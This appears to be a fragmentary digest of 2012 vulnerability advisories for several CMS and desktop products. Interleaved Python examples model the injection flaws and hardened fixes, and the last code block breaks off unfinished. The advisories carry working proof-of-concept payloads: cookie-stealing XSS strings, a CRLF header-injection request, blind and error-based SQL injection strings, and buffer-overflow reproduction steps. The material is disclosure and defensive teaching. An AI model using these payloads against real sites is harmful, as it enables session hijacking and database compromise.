<span style="margin-left:0px" name="div_segundos" id="div_segundos">
<font face="Verdana" size="1">
<input name="Pasw" id="Pasw" style="border:1px solid #FF; width: 300px; font-family:Verdana; font-size:8pt; color:#66; background-color:#00" value="\" type="text">[[PERSISTENT INJECTED SCRIPT CODE!]];) =" size="70"></font></span></td>
</tr>


Risk:
=
1.1
The security risk of the SQL injection vulnerabilities is estimated as 
critical.

1.2
The security risk of the persistent script code injection vulnerabilities is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team]  -Karim H.B. 
(k...@vulnerability-lab.com)
Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies

2012-10-19 Thread Vulnerability Lab
:8080/cmsqlite/admin/helper/deleteMenu.php
http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteArticle.php
http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteCategory.php


Risk:
=
1.1
The security risk of the local file include vulnerability is estimated as 
high(-).

1.2
The security risk of the client side cross site scripting vulnerability is 
estimated as medium(-).

1.3
The security risk of the client side cross site request forgery vulnerabilities 
is estimated as low(+).


Credits:

Katharina S.L.  (ka...@vulnerability-lab.com)






NetCat CMS v5.0.1 - Multiple Web Vulnerabilities

2012-11-01 Thread Vulnerability Lab
Title:
==
NetCat CMS v5.0.1 - Multiple Web Vulnerabilities


Date:
=
2012-10-31


References:
===
http://www.vulnerability-lab.com/get_content.php?id=738


VL-ID:
=
738


Common Vulnerability Scoring System:

2.5


Introduction:
=
Vendor Website: http://netcat.ru  (RU)


Abstract:
=
The Security Effect Research Team discovered multiple web vulnerabilities in 
the Russian NetCat v5.0.1 content management system.


Report-Timeline:

2012-10-31: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple client side cross site scripting and CRLF (response header) injection 
vulnerabilities were detected in the Russian NetCat v5.0.1 content management 
system.
The non-persistent cross site scripting vulnerabilities allow remote attackers 
to craft malicious client side web requests that steal CMS customer session 
information. The CRLF injection allows remote attackers to append their own 
header lines to the HTTP response by placing CR LF sequences in a GET or POST 
parameter value.

The first client side cross site scripting vulnerability is located in the 
search module, in the vulnerable search_query parameter.
The second vulnerability, reported as HTTP parameter pollution, is a CRLF 
injection in the post.php file when it processes the redirect_url parameter.

Successful exploitation of the vulnerabilities can result in HTTP response 
manipulation via POST/GET, client side phishing, client side cookie theft via 
cross site scripting and client side CMS web context manipulation.


Vulnerable Module(s):
[+] search
[+] post

Vulnerable Parameter(s):
[+] search_query
[+] redirect_url


Proof of Concept:
=
1. Client Side - Cross Site Scripting
The client side cross site scripting vulnerabilities can be exploited by remote 
attackers without a privileged application user account and with medium or high 
required user interaction. For demonstration or to reproduce ...

1.1 - In URL address.

PoC:
http://site.127.0.0.1:3666/?' onmouseover='prompt(document.cookie)'bad='


1.2 - In “search_query” parameter.

PoC:
http://site.127.0.0.1:3666/search/?search_query=' onmouseover=prompt(document.cookie) bad='



2. Client Side via POST - CRLF injection/HTTP Parameter Pollution
The CRLF injection can be exploited by remote attackers without a privileged 
application user account and with medium or high required user interaction. 
For demonstration or to reproduce ...

In /netcat/modules/netshop/post.php the URL-encoded POST input redirect_url was 
set to a CR LF sequence followed by NetCatStatus:hacked_by_seceffect

PoC: POST
http://site.127.0.0.1:3666/netcat/modules/netshop/post.php
cart%5b353%5d%5b10%5d=1&cart_mode=add&redirect_url=%0d%0a%20NetCatStatus:hacked_by_seceffect
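The PoC above sends redirect_url=%0d%0a%20NetCatStatus:hacked_by_seceffect; after URL decoding that is a CR LF followed by a space, which lands inside the Location header of the redirect that post.php emits. The Python below is an added example, not NetCat's code: it rebuilds the request body, shows the header block a naive redirect produces, and a hardened redirect that refuses control characters and off-site targets. The /netcat/ allowed prefix and the exact response layout are assumptions for illustration. Note the leading %20: an HTTP/1.1 parser that still honours obsolete line folding treats the injected text as a continuation of the Location value, while without the space it is parsed as a separate header line; either way the attacker controls header text.

```python
from urllib.parse import unquote

# Constructed request body: the advisory's PoC with the '&' separators that the
# page extraction dropped restored (assumption).
POC_BODY = ("cart%5b353%5d%5b10%5d=1&cart_mode=add"
            "&redirect_url=%0d%0a%20NetCatStatus:hacked_by_seceffect")


def parse_form(body):
    """Minimal application/x-www-form-urlencoded decoder (last value wins)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote(key)] = unquote(value)
    return fields


def vulnerable_redirect(redirect_url):
    """Mirrors the flaw: the decoded parameter is concatenated into the header
    block, so a CR LF inside it terminates the Location line and whatever
    follows is parsed as further header text."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + redirect_url + "\r\n"
            "Content-Length: 0\r\n\r\n")


class BadRedirect(ValueError):
    """Raised when a redirect target must not be placed in a header."""


def safe_redirect(redirect_url, allowed_prefix="/netcat/"):
    # 1. No control characters at all (CR, LF, NUL, DEL, ...) may reach a header.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in redirect_url):
        raise BadRedirect("control character in redirect target")
    # 2. Only same-site, path-absolute targets under the application are accepted.
    #    This also blocks open redirects such as "//evil.invalid/" or "http://...".
    if redirect_url.startswith("//") or not redirect_url.startswith(allowed_prefix):
        raise BadRedirect("redirect target outside the application")
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + redirect_url + "\r\n"
            "Content-Length: 0\r\n\r\n")


def header_lines(response):
    """Split a raw response into its status and header lines (body excluded)."""
    head = response.split("\r\n\r\n", 1)[0]
    return head.split("\r\n")


def is_rejected(redirect_url):
    """True when safe_redirect refuses the target."""
    try:
        safe_redirect(redirect_url)
    except BadRedirect:
        return True
    return False


if __name__ == "__main__":
    target = parse_form(POC_BODY)["redirect_url"]
    for line in header_lines(vulnerable_redirect(target)):
        print(repr(line))
    print("rejected by safe_redirect:", is_rejected(target))
```

Run as a script it prints the four header lines, the third of which is the attacker-supplied one, and confirms that the hardened version rejects the same value.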


Risk:
=
1.1
The security risk of the client side cross site scripting vulnerabilities is 
estimated as low(+) to medium(-).

1.2
The security risk of the CRLF injection (reported as HTTP parameter pollution) 
vulnerability is estimated as medium(-).



Credits:

SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/)



VaM Shop v1.69 - Multiple Web Vulnerabilities

2012-11-01 Thread Vulnerability Lab
Title:
==
VaM Shop v1.69 - Multiple Web Vulnerabilities


Date:
=
2012-10-24


References:
===
http://www.vulnerability-lab.com/get_content.php?id=730


VL-ID:
=
730


Common Vulnerability Scoring System:

8.1


Introduction:
=
(Vendor Website: http://vamshop.ru/ )


Abstract:
=
The Security Effect Research Team discovered multiple Web Vulnerabilities in 
the VaM Shop v1.69 web application cms. 


Report-Timeline:

2012-10-24: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
A laboratory researcher discovered a critical SQL injection vulnerability in 
the VaM Shop v1.69 web application content management system.
The vulnerability allows remote attackers to inject and execute their own SQL 
commands on the affected VaM Shop v1.69 DBMS. It is located in the 
shopping_cart.php file, in the vulnerable products_id parameter, and can be 
exploited by remote attackers without user interaction. 
Successful exploitation results in compromise of the web application DBMS and 
service, or in persistent application manipulation via SQL injection.

Vulnerable Files(s):
[+] shopping_cart.php

Vulnerable Parameter(s):
[+] products_id


1.2
A laboratory researcher discovered a client side cross site scripting 
vulnerability in the VaM Shop v1.69 web application content management system.
The vulnerability is located in the advanced_search_result.php file, which 
reflects script code into the search results web context without encoding. 
Successful exploitation results in session hijacking, non-persistent account 
phishing or client side content manipulation.

Vulnerable Files(s):
[+] advanced_search_result.php


Proof of Concept:
=
1. Blind SQL injection in shopping_cart.php, parameter products_id[]. 
The SQL injection vulnerability can be exploited by remote attackers without a 
privileged application user account.
For demonstration or to reproduce ...

PoC: POST - SQL INJECTION

/shopping_cart.php?action=update_product
cart_delete[]=2071&cart_quantity[]=1&old_qty[]=1&products_id[]=2071'[SQL INJECTION VULNERABILITY] and sleep(37)%3d%27

 
2. Multiple Cross Site Scripting
The client side cross site scripting vulnerabilities can be exploited by remote 
attackers with medium or high required user interaction.
For demonstration or to reproduce ...

PoC:
/advanced_search_result.php/o onmouseover=prompt(document.cookie) //
/shopping_cart.php?action=update_product&cart_delete[]=o onmouseover=prompt(document.cookie) //


Risk:
=
1.
The security risk of the blind sql injection vulnerability is estimated as 
high(+).

2.
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/)



BananaDance Wiki b2.2 - Multiple Web Vulnerabilities

2012-11-12 Thread Vulnerability Lab
Title:
==
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities


Date:
=
2012-11-10


References:
===
http://www.vulnerability-lab.com/get_content.php?id=745


VL-ID:
=
745


Common Vulnerability Scoring System:

7.1


Introduction:
=
Banana Dance is an open-source PHP/MySQL-based program. It is designed to 
combine the simplicity of wiki-publishing 
software with the versatility of a CMS. The program also promotes 
community-building through organized and 
user-rated commenting features. Highly flexible with theme-integration and 
extension availability Banana Dance 
can be used for all types of purposes, whether it be to create an entire 
website, a product owner`s manual, or 
an `article`-posting site.

(Copy of the Vendor Homepage: http://www.bananadance.org )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the official BananaDance Wiki b2.2 CMS.


Report-Timeline:

2012-11-10: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
A SQL injection vulnerability was detected in the BananaDance Wiki b2.2 content 
management system.
The vulnerability allows a privileged moderator/admin user account to execute 
its own SQL commands on the affected application DBMS. The SQL injection 
vulnerability is located in the user management module, in the vulnerable alpha 
listing parameter. Successful exploitation of the vulnerability results in DBMS 
& application compromise. Exploitation requires no user interaction, but it does 
require a moderator or admin account, because the listing is served from the 
admin/ path (see Risk).

Vulnerable Module(s):
[+] User Management

Vulnerable Parameter(s):
[+] alpha


1.2
Multiple persistent input validation vulnerabilities were detected in the 
BananaDance Wiki b2.2 content management system. 
The bugs allow remote attackers to inject malicious script code on the 
application side (persistent) of the vulnerable module. 
The persistent vulnerabilities are located in the user, banned user and badge 
listings, in the vulnerable username and email parameters. 
Successful exploitation can lead to session hijacking (manager/admin) or stable 
(persistent) context manipulation. 
Exploitation requires low user interaction (viewing the listing) & a registered 
low privileged web application user account.

Vulnerable Module(s):
[+] Add User - Listing
[+] Banned User - Listing
[+] Badges - Listing

Vulnerable Parameter(s):
[+] Username & Email (Profile)


Proof of Concept:
=
1.1
The SQL injection vulnerability can be exploited by local privileged user 
accounts and moderators.
For demonstration or to reproduce ...

PoC:
<html>
<head>
<title>BananaDance Wiki b2.2 - SQL Vulnerability</title>
</head>
<body>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=A'-1 [SQL-INJECTION!]--" width="1000" height="800"></iframe>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=M'-1 [SQL-INJECTION!]--" width="1000" height="800"></iframe>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=K'-1 [SQL-INJECTION!]--" width="1000" height="800"></iframe>
</body>
</html>
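Both the VaM Shop products_id[] PoC earlier in this digest (2071' and sleep(37)=') and the BananaDance alpha PoC just above (alpha=A'-1 ...--) work for the same reason: a quote in the parameter ends the string literal and everything after it is parsed as SQL. The added example below (not the vendors' code) reproduces both injection points against an in-memory SQLite database and shows the parameterized and allow-listed alternatives. Table and column names are constructed; since SQLite has no sleep(), the time-based payload is replaced by a boolean tautology that breaks the grammar in the same way.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the two shops' tables (assumption:
    the real column names are not on the page; the vulnerable parameters are)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE bd_users (id INTEGER PRIMARY KEY, username TEXT, email TEXT);
        INSERT INTO bd_users (username, email) VALUES
            ('alice', 'alice@example.invalid'),
            ('mark',  'mark@example.invalid'),
            ('kim',   'kim@example.invalid');
        CREATE TABLE products (products_id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (2071, 'Widget'), (2072, 'Gadget');
    """)
    return conn


# --- BananaDance: admin/index.php?l=users&alpha=<letter> ----------------------

def vulnerable_users_by_alpha(conn, alpha):
    """The letter is pasted into the LIKE pattern, so alpha=A'-1 ...-- (the
    PoC) closes the string early and comments out the rest of the statement."""
    sql = "SELECT username FROM bd_users WHERE username LIKE '" + alpha + "%'"
    return [row[0] for row in conn.execute(sql)]


def safe_users_by_alpha(conn, alpha):
    """Allow-list (exactly one ASCII letter) and bind the value. Binding alone
    defeats the PoC; the allow-list documents the contract of the parameter."""
    if len(alpha) != 1 or not alpha.isascii() or not alpha.isalpha():
        raise ValueError("alpha must be a single letter")
    sql = "SELECT username FROM bd_users WHERE username LIKE ?"
    return [row[0] for row in conn.execute(sql, (alpha + "%",))]


# --- VaM Shop: shopping_cart.php?action=update_product, products_id[]=... ------

def vulnerable_cart_products(conn, products_ids):
    """Each array element is quoted by hand. With 2071' and sleep(37)=' the
    condition becomes  products_id = '2071' and sleep(37)=''  on MySQL (a
    37-second delay proves the injection without any visible output); here a
    tautology is used instead because SQLite has no sleep()."""
    where = " OR ".join("products_id = '" + pid + "'" for pid in products_ids)
    return [row[0] for row in conn.execute(
        "SELECT name FROM products WHERE " + where)]


def safe_cart_products(conn, products_ids):
    """One placeholder per array element; the values never touch the SQL text,
    so a quote inside them is just a character of a (non-matching) value."""
    if not products_ids:
        return []
    marks = ",".join("?" for _ in products_ids)
    sql = "SELECT name FROM products WHERE products_id IN (" + marks + ")"
    return [row[0] for row in conn.execute(sql, tuple(products_ids))]


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1' --"
    print("vulnerable alpha:", vulnerable_users_by_alpha(db, tautology))
    print("vulnerable cart :", vulnerable_cart_products(db, ["2071' OR '1'='1"]))
    print("safe cart       :", safe_cart_products(db, ["2071' OR '1'='1"]))
```

The vulnerable alpha lookup returns every user for the tautology, and the vulnerable cart lookup returns every product; the bound versions either reject the input or return nothing, because the bound text "2071' OR '1'='1" is compared as a whole value against the integer column.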


1.2
The persistent input validation vulnerabilities can be exploited by remote 
attackers with a low privileged application user account and 
low required user interaction. For demonstration or to reproduce ...

Review: Add (Existing) User - Listing

<tr id="19">
<td valign="top"><center><img src="imgs/status-on.png" id="status19" alt="Active" title="Active" border="0" height="16" width="16"></center></td>
<td valign="top"><a href="index.php?l=users_edit&id=19">[PERSISTENT EXECUTION OF INJECTED SCRIPT CODE!];) =" a=""></td>
<td valign="top">2012-06-20</td>
<td valign="top"><span style="">ESTANDAR</span></td>
<td valign="top">0</td>
<td valign="top">0</td>
<td valign="top">0</td>
<td valign="top"><a href="#" onClick="deleteID('bd_users','19');return false;"><img src="imgs/icon-delete.png" border="0" alt="Delete" title="Delete" /></a></td>
</tr>

URL(s): 
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users_add
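The GTA UTM solution section earlier in this digest asks for the submitted values and the listings that echo them to be encoded, and the same fix applies to every persistent and reflected XSS collected here (Barracuda, Endpoint Protector, vOlk, NetCat, VaM Shop and the BananaDance listing just above): each value must be HTML-encoded for the context it is written into. The added example below (not any vendor's code) renders constructed templates shaped like the quoted fragments with payloads modelled on the masked ones, compares the raw and encoded output by tag and attribute structure rather than by string matching, and shows that html.escape(..., quote=True) closes both the attribute-value and the text-node case. Template shapes and payloads are assumptions.

```python
import html
import string
from html.parser import HTMLParser

# Constructed payloads modelled on the masked "[PERSISTENT SCRIPT CODE!]" values
# and on the NetCat/VaM onmouseover strings (assumption: the researchers' exact
# inputs are not on the page).
PAYLOADS = {
    "attribute_breakout": '"><iframe src=a onload=alert(1)>',
    "single_quote_attr": "' onmouseover=prompt(document.cookie) bad='",
    "text_node": "<iframe src=//attacker.invalid></iframe>",
}

# Constructed templates shaped like the quoted fragments: GTA user form row,
# BananaDance user listing, a single-quoted attribute, VPN certificate subject.
FORM_ROW = ('<tr><td colspan="3"><input class="forminput" id="{id}" name="{id}" '
            'type="text" size="60" value="{value}" /></td></tr>')
LIST_ROW = ('<tr><td valign="top"><a href="index.php?l=users_edit&amp;id={uid}">'
            '{name}</a></td></tr>')
SQ_ATTR = "<input name=\"domin\" value='{value}' size=\"1\">"
CERT_ROW = ('<tr><td class="formlabel">Subject:</td>'
            '<td>emailAddress = {email}, CN = {cn}, O = {o}</td></tr>')


def render_vulnerable(template, **fields):
    """What the affected pages do: raw values dropped into the markup."""
    return template.format(**fields)


def render_safe(template, **fields):
    """Same template, every value HTML-encoded. quote=True also turns ' and "
    into character references, so a value can never close the attribute it
    sits in; one rule covers text-node and quoted-attribute contexts."""
    return template.format(**{k: html.escape(str(v), quote=True)
                              for k, v in fields.items()})


class _Shape(HTMLParser):
    """Records the tag/attribute-name structure of markup, ignoring values."""
    def __init__(self):
        super().__init__()
        self.shape = []

    def handle_starttag(self, tag, attrs):
        self.shape.append((tag, tuple(sorted(name for name, _ in attrs))))

    def handle_endtag(self, tag):
        self.shape.append(("/" + tag, ()))


def shape(markup):
    parser = _Shape()
    parser.feed(markup)
    parser.close()
    return parser.shape


def breaks_out(template, rendered):
    """True when `rendered` has a different tag/attribute structure than the
    template filled with harmless values, i.e. user data became markup or
    grew new attributes (the onmouseover case has no '<' at all)."""
    names = {name for _, name, _, _ in string.Formatter().parse(template) if name}
    benign = template.format(**{name: "x" for name in names})
    return shape(rendered) != shape(benign)


def audit(template, **fields):
    """(raw render breaks out?, encoded render breaks out?) for one input."""
    return (breaks_out(template, render_vulnerable(template, **fields)),
            breaks_out(template, render_safe(template, **fields)))


if __name__ == "__main__":
    print(audit(FORM_ROW, id="fullName", value=PAYLOADS["attribute_breakout"]))
    print(audit(SQ_ATTR, value=PAYLOADS["single_quote_attr"]))
    print(audit(LIST_ROW, uid="19", name=PAYLOADS["text_node"]))
    print(render_safe(FORM_ROW, id="fullName", value=PAYLOADS["attribute_breakout"]))
```

The structural comparison is the useful check: a filter that only strips "<" would pass the single-quote payload, while the shape of the single-quoted input gains onmouseover and bad attributes and is flagged. The certificate row shows that X.509 subject fields are attacker-controlled input like any form field and need the same encoding.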


Risk:
=
1.1
The security risk of the local SQL injection vulnerability is estimated as 
medium(+) because of the required moderator account.

1.2
The security risk of the persistent input validation vulnerabilities is 
estimated as high.


Credits:

Vulnerability Laboratory [Research Team]  - Kathrin SL 
(ka...@vulnerability-lab.com)



Eventy CMS v1.8 Plus - Multiple Web Vulnerablities

2012-11-13 Thread Vulnerability Lab
 as 
critical.

1.2
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.3
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]








Zoner Photo Studio v15 b3 - Buffer Overflow Vulnerabilities

2012-11-13 Thread Vulnerability Lab
=no name=PenTest40 />
</keyword>
<keyword category=yes name=[BUFFER OVERFLOW (EIP&EBX) VIA IMPORT KEYWORDS!]>
<keyword category=yes name=31337; />
<keyword category=no name=Ibrahim El-Sayed />
<keyword category=no name=PenTest41 />
<keyword category=no name=PenTest42 />
<keyword category=no name=PenTest43 />
<keyword category=no name=PenTest44 />
<keyword category=no name=PenTest45 />
<keyword category=no name=PenTest46 />
<keyword category=no name=PenTest47 />
<keyword category=no name=PenTest48 />
<keyword category=no name=PenTest49 />
</keyword>
</hierarchy>
</keywords>';
?>

--- Debug Logs ---
(3a98.1840): Access violation - code c0000005
eax=00000000 ebx=00410041 ecx=000031e7 edx=0878dd68 esi=0021ced0 edi=00000000
eip=41414141 esp=0021ce68 ebp=0021cebc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!ZwRaiseException+0x12:
76fd15de 83c404          add     esp,4
0:000> u
ntdll!ZwRaiseException+0x12:
76fd15de 83c404          add     esp,4
76fd15e1 c20c00          ret     0Ch
ntdll!NtRaiseHardError:
76fd15e4 b830010000      mov     eax,130h
76fd15e9 33c9            xor     ecx,ecx
76fd15eb 8d542404        lea     edx,[esp+4]
76fd15ef 64ff15c0000000  call    dword ptr fs:[0C0h]
76fd15f6 83c404          add     esp,4
76fd15f9 c21800          ret     18h
0:000> a
76fd15de !exchain



1.2
The buffer overflow vulnerability can be exploited by local attackers with a low 
privileged system user account and without required user interaction.
For demonstration or reproduce ...

Manual Exploitation/Reproduce: Publizieren > Per Mail versenden > Zip 
Comprimierung der Bilder > Archivname + FILE.[ZIP] (STRG+UMS+M)

1. Install & start the Zoner Photo Studio software
2. Click the Publizieren (Publish) button in the main menu and open the Per Mail 
versenden (Send by mail) function - STRG+UMS+M 
3. Activate the Zip Compressed Pictures function (Zip Comprimierung der Bilder)
4. Now you see the standard value (Dateien.zip)
5. Delete one of the two words but do not delete the `.`, because it is required 
for a valid submission (via the OK button)
6. Enter one of the following example strings, Daten.[+Large String AA+] or 
[Large String AA+].zip, and click OK!
7. *BAM! The result is a stack-based buffer overflow [overwrites ebx & eip]


--- Exception Logs ---
EventType=BEX [Buffer Overflow]
EventTime=129972361437653387
ReportType=2
Consent=1
ReportIdentifier=cfbd2b2a-2d1f-11e2-be0d-8c500fdd2fd9
IntegratorReportIdentifier=cfbd2b29-2d1f-11e2-be0d-8c500fdd2fd9
WOW64=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Zps.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=14.0.1.7
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4fffeaeb
Sig[3].Name=Fehlermodulname
Sig[3].Value=StackHash_24fa
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=00000000
Sig[6].Name=Ausnahmeoffset
Sig[6].Value=41414141 <=== EIP
Sig[7].Name=Ausnahmecode
Sig[7].Value=c0000005
Sig[8].Name=Ausnahmedaten
Sig[8].Value=00000008

--- Debug Logs ---
- Access violation - code c0000005
ebx=00410041 
eip=41414141
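The two crash reports above (the WER report with its Sig[n] fields and the WinDbg register dump) carry exactly the facts an analyst needs to triage such a crash. The following Python is an added example, not part of the advisory or of the Zoner software: it parses both shapes and reports whether the exception code is an access violation, whether the WER exception data flags an execute fault (DEP stopping an instruction fetch), and whether EIP and EBX are filled with the 'A' fill byte, either as four narrow bytes or as two UTF-16 code units. The sample text is constructed from the values shown above; the surrounding line layout is assumed.

```python
import re

# Constructed sample input in the shape of the two logs above; the values are
# those the advisory reports, the surrounding layout is assumed.
WER_REPORT = """\
EventType=BEX
Sig[0].Name=Anwendungsname
Sig[0].Value=Zps.exe
Sig[3].Name=Fehlermodulname
Sig[3].Value=StackHash_24fa
Sig[6].Name=Ausnahmeoffset
Sig[6].Value=41414141
Sig[7].Name=Ausnahmecode
Sig[7].Value=c0000005
Sig[8].Name=Ausnahmedaten
Sig[8].Value=00000008
"""

WINDBG_REGS = (
    "eax=00000000 ebx=00410041 ecx=000031e7 edx=0878dd68 esi=0021ced0 edi=00000000\n"
    "eip=41414141 esp=0021ce68 ebp=0021cebc iopl=0         nv up ei pl zr na pe nc\n"
)

STATUS_ACCESS_VIOLATION = 0xC0000005
DEP_EXECUTE_FAULT = 8   # ExceptionInformation[0] == 8: instruction fetch blocked by DEP
FILL_BYTE = 0x41        # the 'A' the reproduction steps fill the archive name with


def parse_wer(text):
    """Pair up Sig[n].Name / Sig[n].Value lines into {name: value}; the names are
    the German WER labels (Ausnahmeoffset = exception offset, Ausnahmecode = code,
    Ausnahmedaten = exception data, Fehlermodulname = faulting module)."""
    names, values = {}, {}
    for line in text.splitlines():
        m = re.match(r"Sig\[(\d+)\]\.(Name|Value)=(.*)", line.strip())
        if m:
            idx, kind, val = m.groups()
            (names if kind == "Name" else values)[idx] = val
    return {names[i]: values.get(i, "") for i in names}


def parse_registers(text):
    """Pull the 32-bit general registers out of WinDbg 'r'-style output."""
    return {reg: int(hexval, 16)
            for reg, hexval in re.findall(r"\b(e[a-z]{2})=([0-9a-fA-F]{8})", text)}


def pattern_controlled(value, fill=FILL_BYTE, wide=False):
    """True when a 32-bit value consists only of the fill byte: four narrow bytes
    (0x41414141) or, with wide=True, two UTF-16LE code units (0x00410041), which
    is how a wide-string copy of 'AA' lands in a register."""
    expected = (fill | fill << 16) if wide else int.from_bytes(bytes([fill]) * 4, "little")
    return value == expected


def triage(wer_text, regs_text):
    """Combine both reports into the yes/no facts a crash triage needs."""
    wer = parse_wer(wer_text)
    regs = parse_registers(regs_text)
    code = int(wer.get("Ausnahmecode", "0"), 16)
    eip = regs.get("eip", 0)
    return {
        "module": wer.get("Fehlermodulname", ""),
        "access_violation": code == STATUS_ACCESS_VIOLATION,
        "exec_fault": int(wer.get("Ausnahmedaten", "0"), 16) == DEP_EXECUTE_FAULT,
        "eip_controlled": pattern_controlled(eip),
        "ebx_controlled_wide": pattern_controlled(regs.get("ebx", 0), wide=True),
        "eip_matches_wer_offset": wer.get("Ausnahmeoffset", "").lower() == f"{eip:08x}",
        # Control of EIP plus an access violation is the usual 'probably exploitable' bar
        "likely_exploitable": code == STATUS_ACCESS_VIOLATION and pattern_controlled(eip),
    }
```

A StackHash fault module name means the faulting address lay outside every loaded module, which is consistent with EIP having been overwritten; EBX holding 0x00410041 rather than 0x41414141 shows the same input reaching a register through a wide-character copy, which a narrow-byte check alone would miss.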


Risk:
=
The security risk of the local buffer overflow vulnerabilities is estimated as 
medium(+)|(-)high.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



iDev Rentals v1.0 - Multiple Web Vulnerabilities

2012-11-14 Thread Vulnerability Lab
 will be executed. 

URL: 
http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=categories

1.3
The remote attacker can add packages to inject own malicious persistent script 
code, <iframe src=http://www.vulnerability-lab.com onload=alert(VL)></iframe>, in 
the fields package name or package description.
When a user views the package listing, the malicious script code is executed. 

URL: 
http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=add_package


Risk:
=
1.1
The security risk of the persistent input validation vulnerabilities is 
estimated as medium(+).


Credits:

Vulnerability Laboratory  - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]







Akeni LAN v1.2.118 - Filter Bypass Vulnerability (Local)

2012-11-19 Thread Vulnerability Lab
Title:
==
Akeni LAN v1.2.118 - Filter Bypass Vulnerability


Date:
=
2012-11-14


References:
===
http://www.vulnerability-lab.com/get_content.php?id=761


VL-ID:
=
761


Common Vulnerability Scoring System:

3.3


Introduction:
=
Akeni LAN Messenger is an IM system designed for your LAN. It is easy to set up 
and does not require a dedicated server 
or Internet connection. The rich client supports chat, notification, 
conferencing, and file transfer. For those who also need 
authentication and encryption, please take a look at our Expert and Pro 
products.

If your organization needs a web based solution that requires no client side 
installation of software, please take a look 
at our Web Chat. Due to the peer-to-peer nature of the product, there is no 
single point of failure and there is no need for 
any network setup. This makes Akeni LAN Messenger a good solution for dynamic 
environments where two people can communicate with 
one another as long as the network itself is up and running. For example, LAN 
Messenger can be used by IT support personnel 
who need a way to communicate and send files to each other anywhere in their 
network easily, without the need to connect 
to the Internet or to a centralized server.

(Copy of the Vendor Website: http://www.akeni.com/en/product/lanmessenger.php )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a filter bypass software 
vulnerability in the official Akeni LAN (LE) Messenger v1.2.118.


Report-Timeline:

2012-11-14: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Local


Severity:
=
Medium


Details:

A filter bypass software vulnerability is detected in the official Akeni 
LAN (LE) Messenger v1.2.118.
The bug allows local attackers to inject own malicious persistent script code 
on the application side.
The vulnerability is located in the Akeni `incorrect length` exception-handling 
module with the bound vulnerable 
groupname (Gruppenname) parameter. The filter of the Akeni LAN Messenger 
sanitizes malicious tags and evil frame 
context but does not recognize a second, split (%20) request after the 
first. The attacker can provoke a first 
parse by injecting, for example, a single tag to match the invalid exception criteria. 
After the provocation he splits the request 
with %20 and injects his own tags directly after it. The result is persistent 
script code execution out of the invalid length 
& invalid parameter software exception-handling.

Vulnerable Module(s):
[+] Menu > Action > Contact List > Add Group

Vulnerable Parameter(s):
[+] Incorrect Length - Exception-Handling
[+] Invalid Context - Exception-Handling


Proof of Concept:
=
The vulnerability can be exploited by local attackers without required user 
interaction. For demonstration or reproduce ...

1.
Let us watch the exception-handling of the invalid length. First we inject a 
standard iframe like <iframe src=a>

['] has incorrect length.
 Groups name must have between %2 and %3 characters.

... the validation of the incorrect length or invalid parameter redisplays the 
message but parses the iframe tag.
We can see in the parsed output that the tag is split from the parse itself, which 
shows there could be an injection possibility.

1.2
The next step is to split the request. HOW?! We inject a standard iframe 
(<iframe src=a>), split the request 
with %20 (space) and inject the second script code after the split.

PoC:
String: <iframe src=a%20<img 
src=http://www.vulnerability-lab.com/gfx/logo-header.png>

--- Exception Logs (Bypass) ---
[] has incorrect length. 
Groups name must have between 30 and %3 characters.
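The Details section and the two PoC steps above describe a filter that handles the first tag it sees and then stops, so a second tag placed after a %20 split is copied through into the "incorrect length" message. The following Python is an added example, not Akeni's code: it models that flawed filter next to a hardened handler that decodes the value once, validates the length of the whole decoded string, and HTML-escapes the entire value before reflecting it. The length bounds are assumptions (the page shows them only as %2 and %3 placeholders); the PoC string is the one from the advisory with its angle brackets restored.

```python
import html
import re
from urllib.parse import unquote

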